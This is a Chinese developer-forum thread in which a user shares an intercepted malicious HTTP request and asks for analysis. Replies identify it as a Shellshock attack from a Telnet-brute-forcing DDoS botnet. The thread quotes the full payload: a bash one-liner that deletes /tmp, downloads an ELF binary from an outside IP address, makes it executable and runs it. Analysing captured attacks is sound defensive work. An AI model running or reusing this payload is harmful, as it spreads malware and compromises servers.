云盾截获一个恶意请求,各位是否有兴趣分析一下? 400 请求报错
42.96.xxx.xxx/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -o /tmp/china.z-pobr >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-pobr >> /tmp/run.sh;echo /tmp/china.z-pobr >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.
下载出来的"java"文件是个ELF
写回答
-
小白看不懂是什么######shell破壳攻击######具体里面执行了一些什么,如何得知?######写了个脚本/tmp/run.sh,到你的系统,,脚本内容时从http://61.160.212.172:911下载个ELF文件,更改权限并执行,,,其实你可以手动把那个文件下下来分析一下,不执行就好
######这个http://61.160.212.172:911/网页可以打开!###### 基于shellshock和telnet弱口令破解的僵尸网络.
主要穷举telnet若口令,然后远程下载木马,执行后telnet&DDOS其他ip2020-05-29 13:06:02赞同 展开评论 打赏
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
